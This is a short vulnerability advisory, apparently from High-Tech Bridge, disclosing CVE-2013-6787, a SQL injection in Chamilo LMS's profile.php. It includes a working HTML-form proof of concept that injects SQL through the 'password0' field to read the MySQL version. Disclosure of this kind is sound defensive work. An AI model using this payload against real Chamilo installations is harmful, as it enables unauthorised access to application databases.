High-Tech Bridge Security Research Lab discovered vulnerability in Chamilo LMS, which can be exploited to perform SQL Injection attacks.
- SQL Injection in Chamilo LMS: CVE-2013-6787
The vulnerability exists due to insufficient validation of “password0” HTTP POST parameter passed to “/main/auth/profile.php” script. A remote authenticated attacker can execute arbitrary SQL commands in application’s database.
The following exploitation example displays version of MySQL server:
<form action=“http://[host]/main/auth/profile.php” method=“post” name=“main”>
<input type=“hidden” name=“password0” value=“’ OR substring(version(),1,1)=5 – “>
<input type=“hidden” name=“password1” value=“password”>
<input type=“hidden” name=“password2” value=“password”>
<input type=“hidden” name=“apply_change” value=””>
<input type=“hidden” name=“firstname” value=“first_name”>
<input type=“hidden” name=“lastname” value=“last_name”>
<input type=“hidden” name=“username” value=“username”>
<input type=“hidden” name=“official_code” value=“USER”>
<input type=“hidden” name=“phone” value=“”>
<input type=“hidden” name=“language” value=“”>
<input type=“hidden” name=“extra_mail_notify_invitation” value=“”>
<input type=“hidden” name=“extra_mail_notify_message” value=“”>
<input type=“hidden” name=“extra_mail_notify_group_message” value=“”>
<input type=“hidden” name=“_qf__profile” value=“”>
<input type=“hidden” name=“” value=“”>
<input type=“submit” id=“btn”>
</form>
Successful exploitation of this vulnerability requires that the application is configured during installation not to encrypt users’ passwords (“Encryption method” option is set to “none”).